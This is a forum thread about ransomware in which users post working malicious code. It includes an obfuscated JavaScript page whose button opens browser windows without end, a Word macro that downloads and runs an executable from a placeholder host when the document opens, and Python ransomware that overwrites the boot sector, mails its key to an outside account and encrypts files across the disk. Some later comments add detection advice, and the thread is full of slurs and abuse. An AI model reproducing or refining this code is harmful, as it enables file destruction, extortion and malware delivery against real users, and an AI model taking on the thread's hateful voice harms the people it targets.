Let's talk crypto.
-
2016-03-29 at 1:34 AM UTC
Is this your ransomware, Sophie?
http://money.cnn.com/2016/03/28/tech...hospital-hack/
I wish. I lol'd when i read that though.It's basically harmless. Just a fork bomb.
Yeah i remember from redfern, thanks but no thanks. -
2016-03-29 at 2:28 AM UTC
Yeah i remember from redfern, thanks but no thanks.
C'mon, now.
-
2016-03-29 at 4:53 PM UTCTen points to the person who knows how I encrypted it in such a way that any browser can still parse it.
-
2016-03-29 at 5 PM UTCspectroll, go make your own thread for your cunt pasted skiddy shit you've been bragging about for years instead of hijacking this one so we can ignore you in peace
-
2016-03-29 at 5:06 PM UTC
spectroll, go make your own thread for your cunt pasted skiddy shit you've been bragging about for years instead of hijacking this one so we can ignore you in peace
The title says, "Let's talk crypto".
-
2016-03-31 at 5:51 PM UTC
spectroll, go make your own thread for your cunt pasted skiddy shit you've been bragging about for years instead of hijacking this one so we can ignore you in peace
At this point i just think he does it for the attention. -
2016-03-31 at 6:13 PM UTC
At this point i just think he does it for the attention.
And yet you two are the only ones grossly off-topic in this thread. Funny how that happens, eh?
-
2016-03-31 at 6:25 PM UTC
And yet you two are the only ones grossly off-topic in this thread. Funny how that happens, eh?
That's right but in response to your faggotry. I would have moved all your bullshit posts from this thread to the trash can if this were Zoklet. You're lucky Lanny has a higher tolerance for skidiots and chronic failtrolls than i do.
inb4 hurr durr MAWD ABUSEY, hurr durr turnip trucks hurr durr you singlehandedly killed zoklet -
2016-03-31 at 6:41 PM UTC
That's right but in response to your faggotry. I would have moved all your bullshit posts from this thread to the trash can if this were Zoklet. You're lucky Lanny has a higher tolerance for skidiots and chronic failtrolls than i do.
inb4 hurr durr MAWD ABUSEY, hurr durr turnip trucks hurr durr you singlehandedly killed zoklet
Aside from all your bluster, you're an off-topic faggit kidiot. You get what you deserve.
-
2016-04-01 at 4:42 AM UTC
Aside from all your bluster, you're an off-topic faggit kidiot. You get what you deserve.
Kill yourself, i post more quality content in a week than you do in a year.
-
2016-04-01 at 6:11 AM UTC
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script language="JavaScript">
<!--
/**
 * Decodes the page body stored in `h` and writes it into the document.
 *
 * Layout of `h`: entries 0-4 are a banner that is written out verbatim, entry 5
 * is a two-digit hex checksum, and entries 6 onward hold the encoded body.
 * Each encoded value is XORed with the constant 44 and with one character of
 * `pw` (cycling through `pw`) to recover the original character.
 *
 * Security note: this is obfuscation, not encryption. The key (`pw`) and the
 * decoder both ship inside the page, so anyone who receives the page can
 * recover the body. A scanner that reads only the served bytes will not see the
 * decoded markup; review what this loop produces (for example by running it in
 * an isolated environment with `document.writeln` replaced by a logger) rather
 * than trusting the encoded form.
 *
 * @returns {boolean} Always true.
 */
function ZOKLock()
{
var h=new Array
(
'<!--*******************************************',
' This page protected by Yomoma ZokLock ',
' Copyright (C) Yomoma Software Co. 2001-2002 ',
' http://www.disney.com/ ',
'********************************************-->',
//Page Begin
// h[5]: expected XOR checksum of the password, as two hex digits.
'6B',
// h[6] onward: the encoded page body. Characters from `x` (0-9, A-F) start a
// two-digit hex value; any other character stands for its own index in `t`.
't!3E 35~U42u"(38$664543GG6533;: :39y,39&.?,3E%65j03+;3813;: :39{~U42uk`tMR4543,3837#,!&$m0A39350D;38"+hq454331@S`x:,3E38+.x3C;?(62MR3544',
'@@S3731&-%:w/36-;38"+`65h1A33 1C32*27;q@SMR3E(38m0A39351A,+!0E)360739/#y}x? $)3637v2739/#62MR4543,3837#,!&$m0A39351F $02)%36`3C38!u`36)$/61',
'y!,3C;#/,343D;`GG"MRhi38(-35*&i62#3C37x07+ (:34p61`q@S3DU4244@:30.3C273E64")%36htj1E -0F!27053D3C.634543GGvou65wGG65o++;#3D-~U4244@q*#',
'*!393Em1501160F1C0B0A1C}z02(3C,0A#*!393Eoy130A0Bth3D+/,66#39og|w;*38$)34664543v39303434-w19"y0D39&30j0F+//;,383Ey1337h05#39-,3Dh1D# 3C|w3C 3E!3C~U42',
'u65%3C!3Cv44@q;/3C31i(,:+?:&?#3D}z.3D:wvo3E3D*!(3Dn3027393E"w/*/66,,32%.!;?3Ew*(/kj/3E#37$&38p{63hxyz}i62U423D/35-}zk0F0C0B1F061Eji&',
'$37+65jjy~ov61qkj;35)36#thnjsn~psoy!34!27!p{63n~7F|{o62664543v+363235h$/3931/3Cuk1A020A14zv44@my`xt39j,35)?&th.3C.,-;hs65)36383C3Em-',
'39(-th0F,34,2727hm*)"-th7Fi62x%(32!3C.?3C!wokunji$,34%65j+3E#18.362730hm/!343D,wo1A,31+"j 3Cnv660Em,31%39,kGGy`xh&$.35);#th,35%*',
'3C61m1A31/+h10%38+`1527$27,66gqs44@;3832x+iwmh{U42?+?y,39un1E%3834+h1E38"3727x0F3C/3E*`19/(##y063727%mvTJ.);j37#:xuim1E-35(!-mvTJ/ ',
'&(qsxn.3Evy#qh323C,+`(htj3D+/35383D62j0E(37h 39m-(3Dh.38(38343D;3Dj193634+-($m3C363D:vj0C-343D%393Emzgs+65jj09323D38(38(y&37:i39 30343Do`q@',
'S)3E`39jp64`"32336336:}kx34j@S%34;,j3630&p38iwp35!q33*w~i3Dx-%39(y#x6362373062)3E`39jp64`"3233633638,3D:3D62j`qiqx{thq7F6134j@S%34;,j3630&',
'p38iwpy,396132+!3C32,`n06181A0B01h0F1F0E12140F011Dm64$`U42,&3E3C`#)%/?-h7F01i-383C33+h30%38y,37;,64m1E/37,+33(y.37?gm6462MR3E(38m3003373D273E(+}hs',
'3E"$35%p3C;?(p3731&-%:w/(-2762j3134,38s6562.37/66/+*3E/,66*% ~i%35rh@S`xhi)?383330!27-or);273C$393C32po3E#)-(65jx66%3C)? 3Dw|u323D; 30',
',;,3Du27%jp{310B&?#-%*63626330$66)3D&3Ev{~64g39t@S|w.&38 gMRt66("3D39664543GG6533;: :39y,39&.?,3E%65j03+;3813;: :39{~U42uk`tMR45433D$37',
'$37?g%3D3C.xui193434123D)%1D$370F(-27q@SMRg66g`gMRt6639.+)(3CwGGTJ64g!3E 35~'
);
//Page End
// Decoding key. It is a literal in the served page, which is why the scheme
// offers no confidentiality.
var pw='default';
// Character table: t.indexOf(ch) is used as a character's numeric value and
// t.charAt(n) as the inverse mapping.
// NOTE(review): the upper half of this literal is shown mis-encoded on this page.
var t='\00\01\02\03\04\05\06\07\010\t\n\013\014\r\016\017\020\021\022\023\024\025\026\027\030\031\032\033\034\035\036\037\040!\042#$%&\047()*+,-./0123456789:;\074=\076?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\134]^_`abcdefghijklmnopqrstuvwxyz{|}~€Â‚ƒ„…†‡ˆ‰Š‹ŒÂŽÂ‘’“â€â€¢â€“—˜™š›œÂžŸ*¡¢£¤¥¦§¨©ª«¬*®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÃÂÃÄÅÆÇÈÉÊËÌÃÃŽÃÃÑÒÓÔÕÖ×ØÙÚÛÜÃÞßà áâãäåæçèéêëìÃîïðñòóôõö÷øùúûüýþÿ';
// Characters that introduce a two-digit hex value in the encoded body.
var x='0123456789ABCDEF';
var i,j,xs;
var c=0;
// XOR the table indices of all password characters into a one-byte checksum.
for(i=0;i<pw.length;i++)
c=c^t.indexOf(pw.charAt(i));
// Compare the checksum with h[5].
// NOTE(review): the mismatch branch is empty, so a failed check changes
// nothing and decoding proceeds with whatever `pw` holds.
if(c!=parseInt(h[5].charAt(0)+h[5].charAt(1),16))
{
}
// Emit the five banner lines, then 40 empty lines, ahead of the decoded body.
for(i=0;i<5;i++)
document.writeln(h[i]);
for(i=0;i<40;i++)
document.writeln();
var n=pw.length;
// m is the current position in the password; it wraps back to 0 at n.
var m=0;
// s accumulates the current decoded output line.
var s='';
for(j=6;j<h.length;j++)
{
for(i=0;i<h[j].length;i++)
{
xs=h[j].charAt(i)
if(x.indexOf(xs)>=0)
{
// Hex form: consume the next character as well and parse both as one byte.
i++;xs=xs+h[j].charAt(i);c=parseInt(xs,16);
}
else
// Literal form: the value is the character's index in the table.
c=t.indexOf(xs);
// Repeating-key XOR: constant 44 combined with the current password character.
c=c^44^t.indexOf(pw.charAt(m));
m++;
if(m==n)
m=0;
// Value 13 ends a line: write out what has accumulated and start over.
if(c==13)
{
document.writeln(s);s='';
}
// Value 10 is dropped.
else if(c==10)
{
;
}
else
s=s+t.charAt(c);
}
}
// Write whatever remains after the last line break.
document.writeln(s);
return true;
}
// Browser sniff: a host whose navigator.appName contains 'Microsoft' runs the
// decoder immediately, while the page is still being parsed; every other
// browser leaves ie at 0 and waits for ZOKLock2().
// Security note: ZOKLock() decodes the page with a key stored in this same
// file, so the scheme only hides markup from casual viewing.
var ie = 0;
if (navigator.appName.indexOf('Microsoft') !== -1) {
  ie = 1;
  ZOKLock();
}
/**
 * Deferred entry point for the decoder, for hosts that did not run it inline.
 *
 * Does nothing when `ie` is non-zero, because in that case ZOKLock() has
 * already been called by the top-level code; otherwise calls ZOKLock() now.
 */
function ZOKLock2() {
  if (ie != 0) {
    return;
  }
  ZOKLock();
}
// -->
</script></head><body onLoad="ZOKLock2();"></body></html>
<html>
<head>
<script language="JavaScript">
<!-- function SymError() { return true; } window.onerror = SymError; var SymRealWinOpen = window.open; function SymWinOpen(url, name, attributes) { return (new Object()); } window.open = SymWinOpen; //-->
</script>
<script LANGUAGE="JavaScript" SRC="prot.js"></script>
<title>So Many Browsers So Little Time</title>
</head>
<body background="ftp://fucked.hopto.org/fakevirus.jpg" bgcolor="#000000" text="#FFFFFF" link="#336699" vlink="#336699" alink="#666666">
<form method="POST">
<p align="center"><input type="Button" size="20" maxlength="256" name="btnAnnoy" value="Click me...G'ahead" onclick="alert('Whos Your Momma?'); var c = 1; var la='Thats Wrong Guess Again Fool'; var zzz = 'Stupid'; while(3 > c) {var p = prompt('Who is the greatest Totsean ever? Attempt #'+c, 'Prepare for smite'); if(p == zzz){c=30} else {if(p ==la){c=30} else c ++}};if(p == zzz){alert('911911911')} else {if(p == la){alert('LUCKY FUCKTWIT')} else {alert('I guess you lose. Goodbye now.'); var iCounter=0;while(true)window.open('http://www.faggot.com')}};" crashing"+icounter('width="1,height=1,resizable=no');iCounter++)}}""></p>
</form>
</body>
<script language="JavaScript">
<!-- window.open = SymRealWinOpen; //-->
</script>
</html>
-
2016-04-01 at 2:32 PM UTC
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script language="JavaScript">
<!--
/**
 * Decodes the page body stored in `h` and writes it into the document.
 *
 * Layout of `h`: entries 0-4 are a banner that is written out verbatim, entry 5
 * is a two-digit hex checksum, and entries 6 onward hold the encoded body.
 * Each encoded value is XORed with the constant 44 and with one character of
 * `pw` (cycling through `pw`) to recover the original character.
 *
 * Security note: this is obfuscation, not encryption. The key (`pw`) and the
 * decoder both ship inside the page, so anyone who receives the page can
 * recover the body. A scanner that reads only the served bytes will not see the
 * decoded markup; review what this loop produces (for example by running it in
 * an isolated environment with `document.writeln` replaced by a logger) rather
 * than trusting the encoded form.
 *
 * @returns {boolean} Always true.
 */
function ZOKLock()
{
var h=new Array
(
'<!--*******************************************',
' This page protected by Yomoma ZokLock ',
' Copyright (C) Yomoma Software Co. 2001-2002 ',
' http://www.disney.com/ ',
'********************************************-->',
//Page Begin
// h[5]: expected XOR checksum of the password, as two hex digits.
'6B',
// h[6] onward: the encoded page body. Characters from `x` (0-9, A-F) start a
// two-digit hex value; any other character stands for its own index in `t`.
't!3E 35~U42u"(38$664543GG6533;: :39y,39&.?,3E%65j03+;3813;: :39{~U42uk`tMR4543,3837#,!&$m0A39350D;38"+hq454331@S`x:,3E38+.x3C;?(62MR3544',
'@@S3731&-%:w/36-;38"+`65h1A33 1C32*27;q@SMR3E(38m0A39351A,+!0E)360739/#y}x? $)3637v2739/#62MR4543,3837#,!&$m0A39351F $02)%36`3C38!u`36)$/61',
'y!,3C;#/,343D;`GG"MRhi38(-35*&i62#3C37x07+ (:34p61`q@S3DU4244@:30.3C273E64")%36htj1E -0F!27053D3C.634543GGvou65wGG65o++;#3D-~U4244@q*#',
'*!393Em1501160F1C0B0A1C}z02(3C,0A#*!393Eoy130A0Bth3D+/,66#39og|w;*38$)34664543v39303434-w19"y0D39&30j0F+//;,383Ey1337h05#39-,3Dh1D# 3C|w3C 3E!3C~U42',
'u65%3C!3Cv44@q;/3C31i(,:+?:&?#3D}z.3D:wvo3E3D*!(3Dn3027393E"w/*/66,,32%.!;?3Ew*(/kj/3E#37$&38p{63hxyz}i62U423D/35-}zk0F0C0B1F061Eji&',
'$37+65jjy~ov61qkj;35)36#thnjsn~psoy!34!27!p{63n~7F|{o62664543v+363235h$/3931/3Cuk1A020A14zv44@my`xt39j,35)?&th.3C.,-;hs65)36383C3Em-',
'39(-th0F,34,2727hm*)"-th7Fi62x%(32!3C.?3C!wokunji$,34%65j+3E#18.362730hm/!343D,wo1A,31+"j 3Cnv660Em,31%39,kGGy`xh&$.35);#th,35%*',
'3C61m1A31/+h10%38+`1527$27,66gqs44@;3832x+iwmh{U42?+?y,39un1E%3834+h1E38"3727x0F3C/3E*`19/(##y063727%mvTJ.);j37#:xuim1E-35(!-mvTJ/ ',
'&(qsxn.3Evy#qh323C,+`(htj3D+/35383D62j0E(37h 39m-(3Dh.38(38343D;3Dj193634+-($m3C363D:vj0C-343D%393Emzgs+65jj09323D38(38(y&37:i39 30343Do`q@',
'S)3E`39jp64`"32336336:}kx34j@S%34;,j3630&p38iwp35!q33*w~i3Dx-%39(y#x6362373062)3E`39jp64`"3233633638,3D:3D62j`qiqx{thq7F6134j@S%34;,j3630&',
'p38iwpy,396132+!3C32,`n06181A0B01h0F1F0E12140F011Dm64$`U42,&3E3C`#)%/?-h7F01i-383C33+h30%38y,37;,64m1E/37,+33(y.37?gm6462MR3E(38m3003373D273E(+}hs',
'3E"$35%p3C;?(p3731&-%:w/(-2762j3134,38s6562.37/66/+*3E/,66*% ~i%35rh@S`xhi)?383330!27-or);273C$393C32po3E#)-(65jx66%3C)? 3Dw|u323D; 30',
',;,3Du27%jp{310B&?#-%*63626330$66)3D&3Ev{~64g39t@S|w.&38 gMRt66("3D39664543GG6533;: :39y,39&.?,3E%65j03+;3813;: :39{~U42uk`tMR45433D$37',
'$37?g%3D3C.xui193434123D)%1D$370F(-27q@SMRg66g`gMRt6639.+)(3CwGGTJ64g!3E 35~'
);
//Page End
// Decoding key. It is a literal in the served page, which is why the scheme
// offers no confidentiality.
var pw='default';
// Character table: t.indexOf(ch) is used as a character's numeric value and
// t.charAt(n) as the inverse mapping.
// NOTE(review): the upper half of this literal is shown mis-encoded on this page.
var t='\00\01\02\03\04\05\06\07\010\t\n\013\014\r\016\017\020\021\022\023\024\025\026\027\030\031\032\033\034\035\036\037\040!\042#$%&\047()*+,-./0123456789:;\074=\076?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\134]^_`abcdefghijklmnopqrstuvwxyz{|}~€Â‚ƒ„…†‡ˆ‰Š‹ŒÂŽÂ‘’“â€â€¢â€“—˜™š›œÂžŸ*¡¢£¤¥¦§¨©ª«¬*®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÃÂÃÄÅÆÇÈÉÊËÌÃÃŽÃÃÑÒÓÔÕÖ×ØÙÚÛÜÃÞßà áâãäåæçèéêëìÃîïðñòóôõö÷øùúûüýþÿ';
// Characters that introduce a two-digit hex value in the encoded body.
var x='0123456789ABCDEF';
var i,j,xs;
var c=0;
// XOR the table indices of all password characters into a one-byte checksum.
for(i=0;i<pw.length;i++)
c=c^t.indexOf(pw.charAt(i));
// Compare the checksum with h[5].
// NOTE(review): the mismatch branch is empty, so a failed check changes
// nothing and decoding proceeds with whatever `pw` holds.
if(c!=parseInt(h[5].charAt(0)+h[5].charAt(1),16))
{
}
// Emit the five banner lines, then 40 empty lines, ahead of the decoded body.
for(i=0;i<5;i++)
document.writeln(h[i]);
for(i=0;i<40;i++)
document.writeln();
var n=pw.length;
// m is the current position in the password; it wraps back to 0 at n.
var m=0;
// s accumulates the current decoded output line.
var s='';
for(j=6;j<h.length;j++)
{
for(i=0;i<h[j].length;i++)
{
xs=h[j].charAt(i)
if(x.indexOf(xs)>=0)
{
// Hex form: consume the next character as well and parse both as one byte.
i++;xs=xs+h[j].charAt(i);c=parseInt(xs,16);
}
else
// Literal form: the value is the character's index in the table.
c=t.indexOf(xs);
// Repeating-key XOR: constant 44 combined with the current password character.
c=c^44^t.indexOf(pw.charAt(m));
m++;
if(m==n)
m=0;
// Value 13 ends a line: write out what has accumulated and start over.
if(c==13)
{
document.writeln(s);s='';
}
// Value 10 is dropped.
else if(c==10)
{
;
}
else
s=s+t.charAt(c);
}
}
// Write whatever remains after the last line break.
document.writeln(s);
return true;
}
// Browser sniff: a host whose navigator.appName contains 'Microsoft' runs the
// decoder immediately, while the page is still being parsed; every other
// browser leaves ie at 0 and waits for ZOKLock2().
// Security note: ZOKLock() decodes the page with a key stored in this same
// file, so the scheme only hides markup from casual viewing.
var ie = 0;
if (navigator.appName.indexOf('Microsoft') !== -1) {
  ie = 1;
  ZOKLock();
}
/**
 * Deferred entry point for the decoder, for hosts that did not run it inline.
 *
 * Does nothing when `ie` is non-zero, because in that case ZOKLock() has
 * already been called by the top-level code; otherwise calls ZOKLock() now.
 */
function ZOKLock2() {
  if (ie != 0) {
    return;
  }
  ZOKLock();
}
// -->
</script></head><body onLoad="ZOKLock2();"></body></html>
<html>
<head>
<script language="JavaScript">
<!-- function SymError() { return true; } window.onerror = SymError; var SymRealWinOpen = window.open; function SymWinOpen(url, name, attributes) { return (new Object()); } window.open = SymWinOpen; //-->
</script>
<script LANGUAGE="JavaScript" SRC="prot.js"></script>
<title>So Many Browsers So Little Time</title>
</head>
<body background="ftp://fucked.hopto.org/fakevirus.jpg" bgcolor="#000000" text="#FFFFFF" link="#336699" vlink="#336699" alink="#666666">
<form method="POST">
<p align="center"><input type="Button" size="20" maxlength="256" name="btnAnnoy" value="Click me...G'ahead" onclick="alert('Whos Your Momma?'); var c = 1; var la='Thats Wrong Guess Again Fool'; var zzz = 'Stupid'; while(3 > c) {var p = prompt('Who is the greatest Totsean ever? Attempt #'+c, 'Prepare for smite'); if(p == zzz){c=30} else {if(p ==la){c=30} else c ++}};if(p == zzz){alert('911911911')} else {if(p == la){alert('LUCKY FUCKTWIT')} else {alert('I guess you lose. Goodbye now.'); var iCounter=0;while(true)window.open('http://www.faggot.com')}};" crashing"+icounter('width="1,height=1,resizable=no');iCounter++)}}""></p>
</form>
</body>
<script language="JavaScript">
<!-- window.open = SymRealWinOpen; //-->
</script>
</html>
Of course you are free to post what you want. But seeing as i value your expertise and appreciate and respect your opinion in the infosec/programming field i was hoping you'd share your thoughts on crypto and ransomware in general. If you have anything interesting to add i'd love to hear about it. Just ignore spectral, he's just a skid trying to look cool.
For delivery of the ransomware i had the following in mind:
A common vector for the delivery of malware is via Word/Excel macro. Obfuscating/encrypting the source code of your malware itself is obviously very important. Not only for opsec purposes but the longer it takes researchers/AV companies to reverse engineer your malware the longer it will stay effective. If your delivery mechanism is through a downloader embedded in an Office document adding obfuscation and encryption not only protects against reverse engineering but aids in evading AV heuristics as well. To that end i've found a python implementation that not only obfuscates your VBA code but automatically generates an Office document based on a template and inserts your downloader within it. What's more, it's fully customizable. It's features are as follows;- Encrypt all strings present in your VBA code
- Encrypt data from your python Script in VBA code (domain names or paths for example)
- Randomize each functions' (or variables) names
- Choose Encryption method, how and where encryption keys are stored
- Generate as many unique MS Office documents as you want using a file name list and a document template
- Enable autodestruction of encryption Keys feature once the VBA has been triggered once
As i understand it, the way it works is as follows. The python script reads in a VB script and looks for certain tags within the code. Based on the tags it performs an operation like randomizing a variable or function name, for instance:
Function [rdm::10]Test() '=> Test() will become randomized with a 10 characters string
[rdm::4]String_1 = "Test" '=> String_1 wil lbecome randomized with a 4 characters string
Depending on the values you set in config.py a type of encryption is selected among a number of other settings. Here's a screenshot of the script in action.
Pretty cool if you ask me, here's a link to the relevant repo on github. https://github.com/Pepitoh/VBad
Now doing some research into malware deployed in this manner and relevant code examples written in VB Script i kind of tried to nigger rig the following based on code found here.
https://github.com/CloudStrief/xcode...doc/skript.txt
' Module-level settings shared by the routines in this macro; InitMe assigns them.
Option Explicit
' Host details read from the environment (COMPUTERNAME, TMP, USERNAME).
Public CN As String
Public APD As String
Public UN As String
' Remote host URL, name of the file written to disk, and remote payload folder.
Public HOSTNAME As String
Public DROPPER_EXE As String
Public PAYLOADS_FOLDER As String
' Declared but not referenced anywhere else in this listing.
Public PAYLOAD_FILE As String
' Assigns the module-level settings: the file name to write, the remote host URL and
' its payload folder, and three values read from the process environment.
' Defender note: the URL and file name are plain string literals here, so static
' macro extraction (for example with olevba) surfaces them directly as indicators.
Function InitMe()
DROPPER_EXE = "malware.exe"
HOSTNAME = "http://www.evilhost.com/code"
PAYLOADS_FOLDER = HOSTNAME & "/payloads/"
CN = Environ("COMPUTERNAME")
APD = Environ("TMP")
UN = Environ("USERNAME")
End Function
' Auto-run entry point: Word raises Document_Open when the document is opened with
' macros enabled. The routine calls InitMe, calls PayLoad with the TMP path joined
' to the file name, then starts that same path through WScript.Shell.
' Defender note: an Office process creating WScript.Shell and spawning a child
' process from the temp directory is a high-signal event. Blocking macros in files
' from the internet and the attack surface reduction rule "Block all Office
' applications from creating child processes" both stop this pattern.
Sub Document_Open()
InitMe
Dim val As String
Dim FN As String
PayLoad (APD + DROPPER_EXE)
Dim oShell
Set oShell = CreateObject("WScript.Shell")
oShell.Run APD + DROPPER_EXE
FN = APD
' Restores default error handling.
On Error GoTo 0
End Sub
' Writes the given byte data to the given path using an ADODB.Stream object.
'   file  - destination path
'   bytes - binary data to write
' Defender note: ADODB.Stream created from an Office macro and used to save a
' binary file is a common dropper trait worth alerting on.
Private Sub writeBytes(file, bytes)
Dim binaryStream
Set binaryStream = CreateObject("ADODB.Stream")
' Type 1 selects binary mode.
binaryStream.Type = 1
binaryStream.Open
binaryStream.Write bytes
' Option 2 overwrites an existing file at the destination.
binaryStream.SaveToFile file, 2
End Sub
' Requests PAYLOADS_FOLDER & DROPPER_EXE over HTTP with Microsoft.XMLHTTP and hands
' the response body to writeBytes for saving at FN.
'   val - not used in the body
'   FN  - destination path for the downloaded bytes
' Defender note: the request goes over plain http and carries a fixed, dated
' User-Agent (MSIE 6.0 on Windows NT 5.1) plus a fixed Accept header set, which
' makes a usable proxy/IDS signature. An Office process fetching an executable
' from the network should be blocked or alerted on at the egress proxy.
Function getPayload(val As String, FN As String)
Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
WinHttpReq.Open "GET", PAYLOADS_FOLDER & DROPPER_EXE
WinHttpReq.SetRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
WinHttpReq.SetRequestHeader "Accept", "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
WinHttpReq.SetRequestHeader "Accept-Language", "en-us,en;q=0.5"
WinHttpReq.SetRequestHeader "Accept-Charset", "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
WinHttpReq.send
writeBytes FN, WinHttpReq.ResponseBody
End Function
This is probably full of errors since i don't have a clue about Visual Basic/VBA/VBS so i was wondering if you could help me improve this particular block of code. Interestingly enough the original repo contains all you need including malware itself written in python and everything you need server side to deploy this. If you're interested here's a link to the complete project.
https://github.com/CloudStrief/xcode -
2016-04-01 at 3:33 PM UTC
<!– function SymError() { return true; } window.onerror = SymError; var SymRealWinOpen = window.open; function SymWinOpen(url, name, attributes) { return (new Object()); } window.open = SymWinOpen; //–>
</script>
You one smart cookie. Is your name really... Oddballz194... by any chance? Not many people can do what you just did thar.
-
2016-04-01 at 3:45 PM UTC
You one smart cookie. Is your name really… Oddballz194… by any chance? Not many people can do what you just did thar.
You should know who aldra is if you've been keeping up. I know your turnip truck routes go back far enough for that. -
2016-04-01 at 4:48 PM UTC
You should know who aldra is if you've been keeping up. I know your turnip truck routes go back far enough for that.
I'mma still gonna guess Oddballz_194. Call me crazy.
If I had to take a second guess, I'd have to go with Fish. -
2016-09-11 at 4:44 PM UTC*Resurrects thread*
Ahh, when this idea was still just that, an idea.
import os
import sys
import random
import struct
import smtplib
import string
import datetime
import time
import getpass as gp
from Crypto.Cipher import AES
from Crypto.PublicKey import RSA
from multiprocessing import Pool
# Module-level state: ID is filled in by gen_client_ID, key is an RSA-2048 key
# generated when the script loads, and exKey is the value send_ID_Key mails out.
ID = ''
key = RSA.generate(2048)
exKey = RSA.exportKey('PEM')
# Boot-sector overwrite attempt, run at load time: dd copies one 512-byte block
# from boot.bin onto /dev/hda, directly when the user is root on 'linux2' (the
# platform string Python 2 reports on Linux) and through sudo otherwise.
# Defender note: audit dd and any other writes to raw block devices, do not allow
# passwordless sudo for interactive users, and keep a backup of sector 0 so the
# boot code and partition table can be restored.
if sys.platform == 'linux2' and gp.getuser() == 'root':
try:
os.system("dd if=boot.bin of=/dev/hda bs=512 count=1 && exit")
except:
pass
else:
try:
os.system("sudo dd if=boot.bin of=/dev/hda bs=512 count=1 && exit")
except:
pass
# Sets the module-level ID to `size` characters picked from `chars` (uppercase
# letters and digits by default) using the `random` module. Returns nothing.
def gen_client_ID(size=12, chars=string.ascii_uppercase + string.digits):
global ID
ID = ''.join(random.choice(chars) for _ in range(size))
# Mails the client ID and exKey to a fixed mailbox: connects to smtp.gmail.com on
# port 587, upgrades with STARTTLS, logs in with the credentials written below and
# sends one message. Any exception is swallowed.
# Defender note: the server, account, password and recipient are literals in the
# script, so they can be lifted from a sample as indicators. Outbound SMTP
# submission (port 587) from a host that is not a mail client or relay is worth
# alerting on and is usually safe to block at the egress firewall.
def send_ID_Key():
ts = datetime.datetime.now()
SERVER = "smtp.gmail.com"
PORT = 587
USER= "address@gmail.com" # Specify Username Here
PASS= "prettyflypassword" # Specify Password Here
FROM = USER
TO = ["address@gmail.com"]
# The subject line carries the local timestamp.
SUBJECT = "Ransomware data: "+str(ts)
MESSAGE = """\Client ID: %s Decryption Key: %s """ % (ID, exKey)
message = """\ From: %s To: %s Subject: %s %s """ % (FROM, ", ".join(TO), SUBJECT, MESSAGE)
try:
server = smtplib.SMTP()
server.connect(SERVER, PORT)
server.starttls()
server.login(USER, PASS)
server.sendmail(FROM, TO, message)
server.quit()
except Exception as e:
# print e
pass
# Writes an AES-CBC encrypted copy of in_filename to out_filename, which defaults
# to in_filename + '.crypt'. The input is read in chunks of `chunksize` bytes.
# Forensic note: the output begins with the original file size as an 8-byte
# little-endian integer, followed by the 16-byte IV and then the ciphertext; a
# final short chunk is padded with spaces to a 16-byte boundary. That header
# layout and the '.crypt' suffix identify files produced by this routine.
def encrypt_file(key, in_filename, out_filename=None, chunksize=64*1024):
if not out_filename:
out_filename = in_filename + '.crypt'
# The IV is 16 values drawn from the `random` module.
iv = ''.join(chr(random.randint(0, 0xFF)) for i in range(16))
encryptor = AES.new(key, AES.MODE_CBC, iv)
filesize = os.path.getsize(in_filename)
with open(in_filename, 'rb') as infile:
with open(out_filename, 'wb') as outfile:
outfile.write(struct.pack('<Q', filesize))
outfile.write(iv)
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
elif len(chunk) % 16 != 0:
chunk += ' ' * (16 - len(chunk) % 16)
outfile.write(encryptor.encrypt(chunk))
# One-argument wrapper around encrypt_file that supplies the module-level `key`;
# selectfiles passes it to Pool.map.
def single_arg_encrypt_file(in_filename):
encrypt_file(key, in_filename)
# Walks the file system from "/" collecting files whose names end with one of the
# listed suffixes, then hands the list to a pool of 4 worker processes that call
# single_arg_encrypt_file on each entry.
# Defender note: a single process tree reading many user files and creating a
# '.crypt' sibling for each is a strong behavioural signal. Offline or immutable
# backups are the mitigation that matters once this has run.
def selectfiles():
ext = [".3g2", ".3gp", ".asf", ".asx", ".avi", ".flv",
".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg",
".rm", ".swf", ".vob", ".wmv" ".docx", ".pdf",".rar",
".jpg",".jpeg",".png", ".tiff", ".zip", ".7z", ".exe",
".tar.gz", "tar", ".mp3", ".sh", ".c", ".h", ".txt"]
files_to_enc = []
for root, dirs, files in os.walk("/"):
for file in files:
if file.endswith(tuple(ext)):
files_to_enc.push(os.path.join(root, file))
pool = Pool(processes=4)
pool.map(single_arg_encrypt_file, files_to_enc)
# Builds the ransom note text and a destination path of $HOME/Desktop/README, then
# opens a file handle and writes to it.
# Defender note: a file named README appearing on the Desktop that contains the
# string "The Cypher Project" is a host indicator for this script. The note text
# itself says no key or decryptor is offered.
def note():
readme = """
.d8888b. 888
d88P Y88b 888
888 888 888
888 888 888 88888b. 88888b. .d88b. 888d888
888 888 888 888 "88b 888 "88b d8P Y8b 888P"
888 888 888 888 888 888 888 888 88888888 888
Y88b d88P Y88b 888 888 d88P 888 888 Y8b. 888
"Y8888P" "Y88888 88888P" 888 888 "Y8888 888
888 888
Y8b d88P 888
"Y88P" 888
Hello, unfortunately all your personal files have been encrypted with millitary grade encryption and will be impossible to retrieve
without aquiring the encryption key and decrypting binary. As of yet these are not available to you since the Cypher ransomware is
still under construction. We thank you for your patience.
Have a nice day,
The Cypher Project."""
# Windows variant
# outdir = os.getenv('USERNAME') + "\\Desktop"
outdir = os.getenv('HOME') + "/Desktop/"
outfile = outdir + "README"
handler = open(outputfile, 'w')
handler.write(outfile, ID)
handler.close()
# Script entry point. Order of operations: generate the client ID, mail the ID and
# key out, then select and encrypt files and write the note. Exceptions raised by
# the last two steps are swallowed.
# Defender note: the mail is sent before any file is touched, so a blocked or
# logged SMTP connection is the earliest network signal of this script running.
if __name__=="__main__":
gen_client_ID()
send_ID_Key()
try:
selectfiles()
note()
except Exception as e:
pass
